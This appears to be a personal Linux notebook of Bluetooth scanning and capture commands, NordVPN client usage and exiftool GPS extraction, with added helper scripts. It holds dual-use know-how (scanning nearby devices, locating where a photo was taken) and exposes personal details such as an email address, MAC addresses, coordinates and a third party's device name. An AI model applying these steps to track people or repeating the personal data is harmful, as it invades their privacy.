Inquiry failed.: No such device $ sudo sdptool --help sdptool - SDP tool v5.50 Usage: sdptool [options] <command> [command parameters] Options: -h Display help -i Specify source interface Commands: search Search for a service browse Browse all available services records Request all records add Add local service del Delete local service get Get local service setattr Set/Add attribute to a SDP record setseq Set/Add attribute sequence to a SDP record Services: DID SP DUN LAN FAX OPUSH FTP PRINT HS HSAG HF HFAG SAP PBAP MAP NAP GN PANU HCRP HID KEYB WIIMOTE CIP CTP A2SRC A2SNK AVRCT AVRTG UDIUE UDITE SEMCHLA SR1 SYNCML SYNCMLSERV ACTIVESYNC HOTSYNC PALMOS NOKID PCSUITE NFTP NSYNCML NGAGE APPLE IAP ISYNC GATT $ l2ping l2ping - L2CAP ping Usage: l2ping [-i device] [-s size] [-c count] [-t timeout] [-d delay] [-f] [-r] [-v] <bdaddr> -f Flood ping (delay = 0) -r Reverse ping -v Verify request and response payload $ sudo btscanner Opening the OUI database Reading the OUI database Finished reading the OUI database No Bluetooth devices available parth@wintermute:~$ sudo btscanner --help Usage: btscanner [options] options --help Display help --cfg=<file> Use <file> as the config file --no-reset Do not reset the Bluetooth adapter before scanning parth@wintermute:~$ $ sudo rfcomm --help RFCOMM configuration utility ver 5.50 Usage: rfcomm [options] <command> <dev> Options: -i, --device [hciX|bdaddr] Local HCI device or BD Address -h, --help Display help -r, --raw Switch TTY into raw mode -A, --auth Enable authentication -E, --encrypt Enable encryption -S, --secure Secure connection -M, --master Become the master of a piconet -L, --linger [seconds] Set linger timeout -a Show all devices (default) Commands: bind <dev> <bdaddr> [channel] Bind device release <dev> Release device show <dev> Show device connect <dev> <bdaddr> [channel] Connect device listen <dev> [channel [cmd]] Listen watch <dev> [channel [cmd]] Watch $ sudo /etc/init.d/bluetooth start Starting bluetooth (via 
systemctl): bluetooth.service.
$ rfkill list all
0: dell-rbtn: Wireless LAN
	Soft blocked: no
	Hard blocked: no
1: phy0: Wireless LAN
	Soft blocked: no
	Hard blocked: no
5: hci0: Bluetooth
	Soft blocked: yes
	Hard blocked: no
$ sudo rfkill unblock bluetooth
parth@wintermute:~$ rfkill list all
0: dell-rbtn: Wireless LAN
	Soft blocked: no
	Hard blocked: no
1: phy0: Wireless LAN
	Soft blocked: no
	Hard blocked: no
5: hci0: Bluetooth
	Soft blocked: no
	Hard blocked: no
$ sudo systemctl enable bluetooth.service
Synchronizing state of bluetooth.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable bluetooth
Created symlink /etc/systemd/system/dbus-org.bluez.service → /lib/systemd/system/bluetooth.service.
Created symlink /etc/systemd/system/bluetooth.target.wants/bluetooth.service → /lib/systemd/system/bluetooth.service.
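The troubleshooting trail above (hciconfig hci0 up failing with "Operation not possible due to RF-kill", the "Blocked through rfkill" lines in the journal, then rfkill unblock fixing it) is worth having as a script that reads the rfkill state instead of guessing. This is an added example, not the notes' own commands; it assumes rfkill(8), systemctl and bluez's hciconfig as used in the notes, and parses the multi-line `rfkill list` output format shown above.

```shell
#!/bin/sh
# Added example (not from the notes): detect an rfkill soft block on the Bluetooth
# controller, lift it, start bluetoothd, bring hci0 up and verify.
# Assumes rfkill(8), systemctl and hciconfig (bluez) as in the notes.

# Given `rfkill list` output in $1, print the index of every Bluetooth entry
# that is soft-blocked. A hard block (hardware switch or BIOS) cannot be lifted
# from software, so it is reported on stderr rather than listed for unblocking.
soft_blocked_bt_indexes() {
    printf '%s\n' "$1" | awk '
        /^[0-9]+:/ { idx = $1; sub(":", "", idx); is_bt = ($0 ~ /Bluetooth/) }
        is_bt && /Soft blocked: yes/ { print idx }
        is_bt && /Hard blocked: yes/ { print "index " idx " is hard blocked" > "/dev/stderr" }
    '
}

# Number of soft-blocked Bluetooth entries in the given `rfkill list` output.
count_soft_blocked_bt() {
    soft_blocked_bt_indexes "$1" | wc -l | tr -d ' '
}

# Live recovery. Usage (as root): recover_bluetooth
# Returns 0 once hciconfig reports hci0 as UP RUNNING.
recover_bluetooth() {
    out=$(rfkill list)
    for idx in $(soft_blocked_bt_indexes "$out"); do
        echo "unblocking rfkill index $idx"
        rfkill unblock "$idx" || return 1
    done
    systemctl start bluetooth.service || return 1
    hciconfig hci0 up || return 1
    hciconfig hci0 | grep -q 'UP RUNNING'
}
```

Unblocking by index rather than with `rfkill unblock bluetooth` keeps the Wi-Fi entries untouched and makes the script report exactly which controller it changed, which is the line you want in a change log.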
More bluetooth stuff
┌──(parth㉿parth)-[~]
└─$ btmgmt info
Index list with 1 item
hci0:	Primary controller
	addr B0:7D:64:E7:BA:A7 version 11 manufacturer 2 class 0x7c010c
	supported settings: powered connectable fast-connectable discoverable bondable link-security ssp br/edr hs le advertising secure-conn debug-keys privacy configuration static-addr phy-configuration wide-band-speech
	current settings: powered connectable discoverable bondable ssp br/edr le secure-conn
	name parth
	short name
hci0:	Configuration options
	supported options: public-address
	missing options:

┌──(parth㉿parth)-[~]
└─$ sudo btmgmt le-oob
LE Device Address: B0:7D:64:E7:BA:A7 (public)
LE Role: 0x01
LE SC Confirmation Value: eb209fad0e7541dc774e91e1ac28833f
LE SC Random Value: 241893696c78452fa850b0a74ad11967
Flags: 0x02

┌──(parth㉿parth)-[~]
└─$ sudo btmgmt secinfo
Primary controller (hci0)
Info length: 15
Flags: 0x0f
Max Key Size (BR/EDR): 16
Max Key Size (LE): 16
Type 4: 2 bytes

┌──(parth㉿parth)-[~]
└─$ sudo btmgmt read-sysconfig
Type: 0x0000 Length: 02 Value: 0000
Type: 0x0001 Length: 02 Value: 0008
Type: 0x0002 Length: 02 Value: 1200
Type: 0x0003 Length: 02 Value: 0000
Type: 0x0004 Length: 02 Value: 0000
Type: 0x0005 Length: 02 Value: 0000
Type: 0x0006 Length: 02 Value: 0000
Type: 0x0007 Length: 02 Value: 0000
Type: 0x0008 Length: 02 Value: 5000
Type: 0x0009 Length: 02 Value: 2003
Type: 0x000a Length: 02 Value: 0008
Type: 0x000b Length: 02 Value: 0008
Type: 0x000c Length: 02 Value: 0200
Type: 0x000d Length: 02 Value: 6000
Type: 0x000e Length: 02 Value: 3000
Type: 0x000f Length: 02 Value: 0004
Type: 0x0010 Length: 02 Value: 1200
Type: 0x0011 Length: 02 Value: 1200
Type: 0x0012 Length: 02 Value: 1200
Type: 0x0013 Length: 02 Value: 6000
Type: 0x0014 Length: 02 Value: 3000
Type: 0x0015 Length: 02 Value: 6000
Type: 0x0016 Length: 02 Value: 6000
Type: 0x0017 Length: 02 Value: 1800
Type: 0x0018 Length: 02 Value: 2800
Type: 0x0019 Length: 02 Value: 0000
Type: 0x001a Length: 02 Value: 2a00
Type: 0x001b Length: 02 Value: a00f
Type: 0x001d Length: 02 Value: 2c01
Type: 0x001e Length: 02 Value: f401
Type: 0x001f Length: 01 Value: 00

┌──(parth㉿parth)-[~]
└─$ hciconfig commands
hci0:	Type: Primary  Bus: USB
	BD Address: B0:7D:64:E7:BA:A7  ACL MTU: 1021:4  SCO MTU: 96:6
	UP RUNNING PSCAN ISCAN
	RX bytes:15053 acl:125 sco:0 events:825 errors:0
	TX bytes:22893 acl:104 sco:0 commands:610 errors:0

┌──(parth㉿parth)-[~]
└─$ hcitool dev
Devices:
	hci0	B0:7D:64:E7:BA:A7

Capture the traces from hci0 to the file hcidump.log:
$ btmon -i hci0 -w hcidump.log
Open the trace file:
$ btmon -r hcidump.log
Live debugging:
$ sudo btmon
Saving it for later:
$ sudo btmon --write ~/hcitrace.snoop
Wireshark can open the snoop files and, with its powerful abilities to filter out and colorize packets, it is a handy tool. Someone who knows a bit about Bluetooth might benefit a lot just by reading those logs.
https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/doc/btsnoop.txt

pi@RPi3:~ $ bluetoothctl
[bluetooth]# set-scan-filter-clear
SetDiscoveryFilter success
[bluetooth]# scan on
Discovery started
Once we know the Service UUID we can filter to see just Eddystone beacons in bluetoothctl. For example:
[bluetooth]# set-scan-filter-uuids 0xfeaa
SetDiscoveryFilter success
[bluetooth]# scan on
Discovery started

┌──(parth㉿parth)-[/var/log]
└─$ bluetoothd -v
5.66

┌──(parth㉿parth)-[/var/log]
└─$ tcpdump --version
tcpdump version 4.99.3
libpcap version 1.10.3 (with TPACKET_V3)
OpenSSL 3.0.8 7 Feb 2023

┌──(parth㉿parth)-[/var/log]
└─$ tcpdump -D
1.wlan0 [Up, Running, Wireless, Associated]
2.any (Pseudo-device that captures on all interfaces) [Up, Running]
3.lo [Up, Running, Loopback]
4.wlan1 [Up, Wireless]
5.eth0 [Up, Disconnected]
6.bluetooth0 (Bluetooth adapter number 0) [Wireless, Association status unknown]
7.bluetooth-monitor (Bluetooth Linux Monitor) [Wireless]
8.nflog (Linux netfilter log (NFLOG) interface) [none]
9.nfqueue (Linux netfilter queue (NFQUEUE) interface) [none]
10.dbus-system (D-Bus system bus) [none]
11.dbus-session (D-Bus session bus) [none]

Now that we know the name of the Bluetooth interface, let's set up a capture on bluetooth0 to see if there is any explanation for the connection issues. To set up the capture, use tcpdump on the Linux machine to capture and write the packet data from the bluetooth0 interface to a pcap file for later examination. Next, attempt to establish the Bluetooth connection between the Linux and macOS machines and attempt to send a file or two over that connection to provide some clues as to what might be happening. To set up a tcpdump capture, run this command:
# Capture bluetooth packets and write them to a pcap file called bluetooth0_capture_12_10.pcap
$ tcpdump -i bluetooth0 -w bluetooth0_capture_12_12.pcap

bluetoothctl is the command for pairing the system with a device. bluetoothctl [1] is the main command for configuring Bluetooth devices on Linux. Contrary to what the name's structure might lead you to expect, bluetoothctl is not part of systemd, but rather a simple set of options for setting up Bluetooth devices. In its current version, bluetoothctl works only with MAC addresses. Many devices allow you to change the name, which can reduce the possibility of confusion if you have two devices of the same kind from the same manufacturer. However, while bluetoothctl may list device names, its options do not work with the device names.
systemctl status bluetooth
systemctl start bluetooth
https://www.linux-magazine.com/Issues/2017/197/Command-Line-bluetoothctl
--------
Identify your computer's Bluetooth adapter:
$ hcitool dev
Devices:
	hci0	A3:3E:XX:XX:G3:86
Scan for available devices:
$ hcitool -i hci0 scan
Scanning ...
	FC:XX:XX:XX:XX:FE	n/a
Trust the discovered device:
$ bluetoothctl
[bluetooth]# trust FC:XX:XX:XX:XX:FE
[CHG] Device FC:XX:XX:XX:XX:FE Trusted: yes
Connect:
[bluetooth]# connect FC:XX:XX:XX:XX:FE
Attempting to connect to FC:XX:XX:XX:XX:FE
Connection successful
[E7]#
Extras:
[E7]# paired-devices
Device FC:XX:XX:XX:XX:FE E7
[bluetooth]# list
[bluetooth]# show
[bluetooth]# select 70:1A:04:59:69:04
https://lynxbee.com/scan-pair-connect-to-bluetooth-device-from-ubuntu-from-command-line-using-bluetoothctl/#.Yn7063X32Uk
[bluetooth]# connect A8:2B:B9:1C:39:C7
[bluetooth]# info
[bluetooth]# menu gatt
[bluetooth]# help
https://budimir.cc/2020/02/27/ble-on-linux-with-bluetoothctl/
A8:2B:B9:1C:39:C7

┌──(parth㉿Parth)-[~]
└─$ hcitool dev
Devices:
	hci1	08:BE:AC:13:FF:0F
	hci0	B0:7D:64:E7:BA:A7
┌──(parth㉿Parth)-[~]
└─$ hcitool -i hci0 scan
Scanning ...
	A8:2B:B9:1C:39:C7	William's Galaxy Note9
┌──(parth㉿Parth)-[~]
└─$ hcitool -i hci1 scan
Scanning ...
	A8:2B:B9:1C:39:C7	William's Galaxy Note9
--------
sudo systemctl status bluetooth
sudo systemctl enable bluetooth
sudo systemctl start bluetooth
bluetoothctl scan on
bluetoothctl discoverable on
bluetoothctl pair FC:69:47:7C:9D:A3
bluetoothctl connect FC:69:47:7C:9D:A3
bluetoothctl paired-devices
bluetoothctl devices
bluetoothctl trust FC:69:47:7C:9D:A3
bluetoothctl untrust FC:69:47:7C:9D:A3
bluetoothctl remove FC:69:47:7C:9D:A3
bluetoothctl disconnect FC:69:47:7C:9D:A3
bluetoothctl block FC:69:47:7C:9D:A3
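Added here as a worked example (my own script, not part of any of the quoted tools): the btmgmt info output above shows hci0 with "discoverable" in its current settings, which is the state a defender wants to notice. This reads the supported/current settings lines of btmgmt info and reports what deserves attention. SAMPLE_BTMGMT is the hci0 output recorded above; the setting names are the ones btmgmt prints.

```shell
#!/bin/sh
# Added example: parse 'btmgmt info' and flag adapter states worth reviewing.
# SAMPLE_BTMGMT is the hci0 output from the notes above.

SAMPLE_BTMGMT='Index list with 1 item
hci0:	Primary controller
	addr B0:7D:64:E7:BA:A7 version 11 manufacturer 2 class 0x7c010c
	supported settings: powered connectable fast-connectable discoverable bondable link-security ssp br/edr hs le advertising secure-conn debug-keys privacy configuration static-addr phy-configuration wide-band-speech
	current settings: powered connectable discoverable bondable ssp br/edr le secure-conn
	name parth
	short name'

# bt_settings TEXT KIND -> the space-separated list after "KIND settings:"
# (KIND is "current" or "supported")
bt_settings() {
    printf '%s\n' "$1" | awk -v kind="$2" '
        $1 == kind && $2 == "settings:" { $1 = ""; $2 = ""; sub(/^ +/, ""); print }'
}

# bt_has TEXT KIND NAME -> yes if NAME is an exact token in that settings list, else no
bt_has() {
    for s in $(bt_settings "$1" "$2"); do
        [ "$s" = "$3" ] && { echo yes; return 0; }
    done
    echo no
}

bt_setting_on() { bt_has "$1" current "$2"; }     # is NAME active right now?
bt_supports()   { bt_has "$1" supported "$2"; }   # can the controller do NAME at all?

# bt_posture TEXT -> one finding per line (prints nothing when there is nothing to report)
bt_posture() {
    [ "$(bt_setting_on "$1" discoverable)" = yes ] &&
        echo "discoverable: adapter answers inquiry scans from any nearby device; run 'bluetoothctl discoverable off' when not pairing"
    [ "$(bt_setting_on "$1" secure-conn)" = no ] &&
        echo "secure-conn off: pairings fall back to legacy (pre-Secure Connections) key generation"
    [ "$(bt_setting_on "$1" privacy)" = no ] && [ "$(bt_supports "$1" privacy)" = yes ] &&
        echo "privacy off: LE advertising uses the fixed public address although the controller supports random resolvable addresses"
    return 0
}

# Live use: bt_posture "$(btmgmt info)"
bt_posture "$SAMPLE_BTMGMT"
```

On the recorded output this reports two findings (discoverable on, privacy off); secure-conn is already on, so it stays quiet about that.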
---[GPS]--- (top)
This is how to pull gps coordinates from an image and display a map of the location.
Run this command to report the GPS info. You can use a wildcard such as *.jpg.
$ exiftool -gps:all -c "%.6f degrees" 20190117_152351.jpg
GPS Latitude Ref                : North
GPS Latitude                    : 38.189984 degrees
GPS Longitude Ref               : West
GPS Longitude                   : 84.834734 degrees
GPS Altitude Ref                : Above Sea Level
GPS Altitude                    : 0 m
GPS Time Stamp                  : 20:23:38
GPS Processing Method           : CELLID
GPS Date Stamp                  : 2019:01:17
Using the info above, build the following string:
38.189984 N 84.834734 W
Enter this string as a google search term. You will get a map.
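Added here as a worked example (my own script, not from exiftool): it turns the exiftool GPS output above into the search string, a signed decimal pair and a maps link, and it also accepts exiftool's default degrees/minutes/seconds rendering (what you get without the -c option). SAMPLE_EXIF is the output recorded above; SAMPLE_EXIF_DMS is a constructed DMS rendering of the same fix; the Google Maps ?q=lat,lon link form is assumed.

```shell
#!/bin/sh
# Added example: exiftool GPS tags -> "lat N lon W", signed decimals, maps URL.
# SAMPLE_EXIF is the exiftool output from the notes; SAMPLE_EXIF_DMS is constructed.

SAMPLE_EXIF='GPS Latitude Ref                : North
GPS Latitude                    : 38.189984 degrees
GPS Longitude Ref               : West
GPS Longitude                   : 84.834734 degrees
GPS Altitude Ref                : Above Sea Level
GPS Altitude                    : 0 m
GPS Time Stamp                  : 20:23:38
GPS Processing Method           : CELLID
GPS Date Stamp                  : 2019:01:17'

SAMPLE_EXIF_DMS="GPS Latitude Ref                : North
GPS Latitude                    : 38 deg 11' 23.94\"
GPS Longitude Ref               : West
GPS Longitude                   : 84 deg 50' 5.04\""

# gps_parse TEXT MODE
#   MODE=search  -> "38.189984 N 84.834734 W"   (the string to paste into a search box)
#   MODE=decimal -> "38.189984 -84.834734"      (S and W become negative)
# Prints "no GPS tags" and returns 1 unless all four tags are present.
# todec() strips everything but digits and dots, so "38.189984 degrees" becomes one
# number and a DMS value becomes three numbers that are combined as d + m/60 + s/3600.
gps_parse() {
    printf '%s\n' "$1" | awk -F' *: *' -v mode="$2" '
        function todec(v,    n, p) {
            gsub(/[^0-9.]+/, " ", v); n = split(v, p, " ")
            return (n >= 3) ? p[1] + p[2] / 60 + p[3] / 3600 : p[1] + 0
        }
        $1 == "GPS Latitude"      { lat = todec($2); have++ }
        $1 == "GPS Longitude"     { lon = todec($2); have++ }
        $1 == "GPS Latitude Ref"  { latref = substr($2, 1, 1); have++ }
        $1 == "GPS Longitude Ref" { lonref = substr($2, 1, 1); have++ }
        END {
            if (have != 4) { print "no GPS tags"; exit 1 }
            if (mode == "search")
                printf "%.6f %s %.6f %s\n", lat, latref, lon, lonref
            else
                printf "%.6f %.6f\n", (latref == "S" ? -lat : lat), (lonref == "W" ? -lon : lon)
        }'
}

gps_search_string() { gps_parse "$1" search; }
gps_decimal()       { gps_parse "$1" decimal; }

# gps_map_url TEXT -> Google Maps link for the fix (assumes the ?q=lat,lon query form)
gps_map_url() {
    set -- $(gps_decimal "$1")
    [ $# -eq 2 ] || return 1
    echo "https://www.google.com/maps?q=$1,$2"
}

# gps_from_file IMAGE -> search string read live from the file (needs exiftool installed)
gps_from_file() { gps_search_string "$(exiftool -gps:all -c '%.6f degrees' "$1")"; }

gps_search_string "$SAMPLE_EXIF"
gps_map_url "$SAMPLE_EXIF"
```

Use gps_from_file on a photo to get the same string the notes build by hand; gps_decimal is the form most mapping tools and APIs want.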
Commands:
$ nordvpn help
$ sudo nordvpn login
$ sudo nordvpn connect
$ sudo nordvpn disconnect
$ nordvpn set help
$ sudo nordvpn set protocol udp
$ sudo nordvpn set killswitch enable
$ sudo nordvpn set cybersec disable
$ sudo nordvpn settings
$ sudo nordvpn countries
$ sudo nordvpn cities Germany
$ sudo nordvpn connect Germany Frankfurt
$ sudo nordvpn status
$ sudo nordvpn logout
$ systemctl status nordvpnd
$ sudo nordvpn settings
$ sudo nordvpn set dns [server address]
$ sudo nordvpn set dns 1.1.1.1 8.8.8.8

Interesting: you can connect to a specific server with
nordvpn c us1231
nordvpn set autoconnect on romania

If you want to get back to the original NordVPN DNS servers, then apply the following:
nordvpn set dns off

These are our (Nord) DNS servers: 162.242.211.137 and 78.46.223.24
domain nordvpn.com
nameserver 103.86.96.100
nameserver 103.86.99.100

$ nordvpn countries
Albania                 Estonia         Latvia          Slovakia
Argentina               Finland         Lithuania       Slovenia
Australia               France          Luxembourg      South_Africa
Austria                 Georgia         Malaysia        South_Korea
Belgium                 Germany         Mexico          Spain
Bosnia_And_Herzegovina  Greece          Moldova         Sweden
Brazil                  Hong_Kong       Netherlands     Switzerland
Bulgaria                Hungary         New_Zealand     Taiwan
Canada                  Iceland         North_Macedonia Thailand
Chile                   India           Norway          Turkey
Costa_Rica              Indonesia       Poland          Ukraine
Croatia                 Ireland         Portugal        United_Kingdom
Cyprus                  Israel          Romania         United_States
Czech_Republic          Italy           Serbia          Vietnam
Denmark                 Japan           Singapore

$ nordvpn cities Switzerland
Zurich

$ nordvpn cities United_States
Atlanta         Chicago         Kansas_City     Miami           Saint_Louis     Seattle
Buffalo         Dallas          Los_Angeles     New_York        Salt_Lake_City
Charlotte       Denver          Manassas        Phoenix         San_Francisco

Welcome to NordVPN Linux client app!
Version 3.12.5
Website: https://nordvpn.com

Usage: nordvpn [global options] command [command options] [arguments...]

Commands:
   account        Shows account information
   cities         Shows a list of cities where servers are available
   connect, c     Connects you to VPN
   countries      Shows a list of countries where servers are available
   disconnect, d  Disconnects you from VPN
   groups         Shows a list of available server groups
   login          Logs you in
   logout         Logs you out
   rate           Rates your last connection quality (1-5)
   register       Registers a new user account
   set, s         Sets a configuration option
   settings       Shows current settings
   status         Shows connection status
   version        Shows the app version
   whitelist      Adds or removes an option from a whitelist
   help, h        Shows a list of commands or help for one command

Global options:
   --help, -h     show help (default: false)
   --version, -v  print the version (default: false)

For more detailed information, please check manual page.
Our customer support works 24/7 so if you have any questions or issues, drop us a line at https://support.nordvpn.com/
--------
NordVPN for Linux successfully installed!
To get started, please re-login or execute `su - $USER` in the current shell, type 'nordvpn login' and enter your NordVPN account details. Then type 'nordvpn connect' and you're all set! To allow other users to use the application run 'usermod -aG nordvpn otheruser'. If you need help using the app, use the command 'nordvpn --help'.

$ nordvpn login
Continue in the browser: https://zwyr157wwiu6eior.com/v1/users/oauth/login-redirect?attempt=020f7f1e-70fe-4f16-a133-552a4cee2731

nordvpn login
nordvpn connect

$ nordvpn connect
Connecting to United States #8052 (us8052.nordvpn.com)
You are connected to United States #8052 (us8052.nordvpn.com)!
$ nordvpn account
Account Information:
Email Address: wbbellamy@gmail.com
VPN Service: Active (Expires on Mar 26th, 2024)

$ nordvpn settings
Technology: OPENVPN
Protocol: UDP
Firewall: enabled
Kill Switch: disabled
CyberSec: disabled
Obfuscate: disabled
Notify: disabled
Auto-connect: disabled
IPv6: disabled
DNS: disabled

$ nordvpn status
Status: Connected
Current server: us8052.nordvpn.com
Country: United States
City: Atlanta
Server IP: 92.119.17.75
Current technology: OPENVPN
Current protocol: UDP
Transfer: 2.21 MiB received, 1.27 MiB sent
Uptime: 3 minutes 53 seconds

Settings
To access the NordVPN client settings, type the nordvpn command in Terminal. Here is the list of available commands:
nordvpn login - Log in.
nordvpn connect or nordvpn c - Connect to VPN. To connect to specific servers, use nordvpn connect (country_code server_number) (eg. nordvpn connect uk715)
nordvpn disconnect or nordvpn d - Disconnect from VPN.
nordvpn connect US -g double_vpn - Connect to a Double VPN server where the first hop is a specific country
nordvpn connect P2P - connect to a P2P server.
nordvpn connect The_Americas - connect to servers located in the Americas.
nordvpn connect Dedicated_IP - connect to a Dedicated IP server.
nordvpn set or nordvpn s - Set a configuration option. Possible options:
    nordvpn set cybersec on or off - Enable or disable CyberSec
    nordvpn set killswitch on or off - Enable or disable Kill Switch
    nordvpn set autoconnect on or off - Enable or disable auto-connect. You can set a specific server for automatic connection using nordvpn set autoconnect on country_code+server_number. Example: nordvpn set autoconnect on us2435.
    nordvpn set notify on or off - Enable or disable notifications
    nordvpn set dns 1.1.1.1 1.0.0.1 - Set custom DNS (you can set up a single DNS or two like shown in this command).
    nordvpn set protocol udp or tcp - Switch between UDP and TCP protocols
    nordvpn set obfuscate on or off - Enable or disable Obfuscated Servers.
    nordvpn set technology - Set connection technology (OpenVPN or NordLynx)
nordvpn whitelist add port 22 - Add a rule to whitelist a specified incoming port. You can also whitelist multiple ports, just separate their numbers with a space.
nordvpn whitelist remove port 22 - Remove the rule to whitelist a specified port.
nordvpn whitelist add subnet 192.168.0.0/16 - Add a rule to whitelist a specified subnet.
nordvpn whitelist remove subnet 192.168.0.0/16 - Remove the rule to whitelist a specified subnet.
nordvpn account - See account information
nordvpn register - Register a new user account
nordvpn rate - Rate your last connection quality (1-5)
nordvpn settings - See the current settings.
nordvpn status - See the connection status.
nordvpn countries - See the country list.
nordvpn cities - See the city list. E.g.: nordvpn cities united_states
nordvpn groups - See a list of available server groups.
nordvpn logout - Log out.
nordvpn help or nordvpn h - See the list of available commands or help for a specific command.
You can get an extensive explanation of all commands by using the man nordvpn command in Terminal.

Here's how to disable IPv6 on a Debian-based machine.
Open a terminal window and type this command:
sudo nano /etc/sysctl.conf
Add the following at the bottom of the file:
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1
net.ipv6.conf.tun0.disable_ipv6 = 1
Save and close the file. Reboot the device.
To re-enable IPv6, remove the above lines from /etc/sysctl.conf and reboot the device.
https://support.nordvpn.com/Connectivity/Linux/1047409422/How-can-I-connect-to-NordVPN-using-Linux-Terminal.htm
$ man nordvpn
$ nordvpn help
$ sudo nordvpn connect
$ sudo nordvpn disconnect
$ nordvpn set help
$ sudo nordvpn set protocol udp
$ sudo nordvpn set killswitch enable
$ sudo nordvpn set cybersec enable
$ sudo nordvpn set obfuscate disable
$ sudo nordvpn set autoconnect enable
$ sudo nordvpn set dns 1.1.1.1 8.8.8.8
$ sudo nordvpn set dns disable
$ sudo nordvpn whitelist add port 22 protocol TCP
$ sudo nordvpn whitelist remove port 80 protocol TCP
$ sudo nordvpn settings
$ sudo nordvpn countries
$ sudo nordvpn cities Germany
$ sudo nordvpn connect Germany Frankfurt
$ sudo nordvpn status
$ sudo nordvpn logout

Reset your Linux settings:
sudo rm /var/lib/nordvpn/data/settings.dat

$ nordvpn c Double_VPN
Connecting to United States - Canada #36 (us-ca36.nordvpn.com)
You are connected to United States - Canada #36 (us-ca36.nordvpn.com)!
$ nordvpn c Double_VPN
Connecting to Canada - United States #55 (ca-us55.nordvpn.com)
You are connected to Canada - United States #55 (ca-us55.nordvpn.com)!

Using the following commands, you can get a list of all the available countries and cities:
nordvpn countries
nordvpn cities
nordvpn connect United_Kingdom Manchester

Display the firewall configuration defined by the service:
$ sudo iptables -L -v -n
Display the service configuration:
$ cat ~/.config/nordvpn/nordvpn.conf
Display the DNS configuration:
$ cat /etc/resolv.conf
Display the service status:
$ systemctl status nordvpnd

When connected to NordVPN:
$ traceroute 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets
 1  10.8.3.1 (10.8.3.1)  45.332 ms  45.332 ms  45.330 ms
 2  * * *
 3  148.72.136.2 (148.72.136.2)  52.277 ms  52.290 ms  52.287 ms
 4  ae1.stl1-cr-rigel.bb.gdinf.net (207.38.95.9)  45.251 ms  46.302 ms  46.306 ms
 5  stlo-b1-link.ip.twelve99.net (62.115.165.90)  46.313 ms  46.309 ms  46.309 ms
 6  stlo-b3-link.ip.twelve99.116.115.62.in-addr.arpa (62.115.116.54)  46.267 ms  43.686 ms  43.689 ms
 7  stlo-b1-link.ip.twelve99.net (62.115.135.194)  43.698 ms  43.680 ms  43.649 ms
 8  chi-b23-link.ip.twelve99.net (62.115.113.173)  50.635 ms  50.637 ms  50.642 ms
 9  google-ic326615-chi-b23.ip.twelve99-cust.net (80.239.128.33)  50.538 ms  50.572 ms  50.576 ms
10  * * *
11  dns.google (8.8.8.8)  51.312 ms  51.359 ms  51.364 ms

When not connected to NordVPN:
$ traceroute 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets
 1  dsldevice.attlocal.net (192.168.1.254)  5.481 ms  5.436 ms  5.419 ms
 2  104-52-8-1.lightspeed.lsvlky.sbcglobal.net (104.52.8.1)  7.889 ms  7.874 ms  7.859 ms
 3  99.186.140.206 (99.186.140.206)  7.844 ms  8.483 ms  8.468 ms
 4  * * *
 5  * * *
 6  * * *
 7  * * *
 8  32.130.17.55 (32.130.17.55)  15.792 ms  15.773 ms  15.757 ms
 9  12.255.10.8 (12.255.10.8)  15.971 ms  15.724 ms  15.695 ms
10  * * *
11  dns.google (8.8.8.8)  15.676 ms  15.670 ms  15.665 ms

With Double_VPN:
$ traceroute 8.8.8.8
traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets
 1  10.8.8.1 (10.8.8.1)  49.635 ms  49.637 ms  49.636 ms
 2  10.0.2.2 (10.0.2.2)  90.082 ms  90.098 ms  90.097 ms
 3  212.103.48.57 (212.103.48.57)  90.094 ms  90.092 ms  90.136 ms
 4  * * *
 5  217.138.223.36 (217.138.223.36)  90.042 ms 217.138.223.38 (217.138.223.38)  90.040 ms 217.138.223.36 (217.138.223.36)  90.050 ms
 6  74.125.51.94 (74.125.51.94)  90.026 ms 142.250.47.56 (142.250.47.56)  88.105 ms  88.046 ms
 7  108.170.248.97 (108.170.248.97)  85.643 ms 108.170.248.33 (108.170.248.33)  100.519 ms 108.170.248.97 (108.170.248.97)  100.409 ms
 8  142.251.65.93 (142.251.65.93)  100.346 ms 142.251.65.103 (142.251.65.103)  100.366 ms 216.239.62.25 (216.239.62.25)  100.398 ms
 9  dns.google (8.8.8.8)  100.371 ms  100.346 ms  100.366 ms

With Double VPN:
$ ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=2 ttl=118 time=78.7 ms
64 bytes from 8.8.8.8: icmp_seq=3 ttl=118 time=191 ms
64 bytes from 8.8.8.8: icmp_seq=4 ttl=118 time=216 ms
64 bytes from 8.8.8.8: icmp_seq=5 ttl=118 time=96.4 ms
64 bytes from 8.8.8.8: icmp_seq=6 ttl=118 time=102 ms
64 bytes from 8.8.8.8: icmp_seq=7 ttl=118 time=188 ms
64 bytes from 8.8.8.8: icmp_seq=8 ttl=118 time=202 ms
^C
--- 8.8.8.8 ping statistics ---
9 packets transmitted, 7 received, 22.2222% packet loss, time 8028ms
rtt min/avg/max/mdev = 78.687/153.534/215.640/53.936 ms

$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether c0:25:a5:16:53:2d  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 39  bytes 2131 (2.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 39  bytes 2131 (2.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.8.0.8  netmask 255.255.255.0  destination 10.8.0.8
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 12891  bytes 4614321 (4.4 MiB)
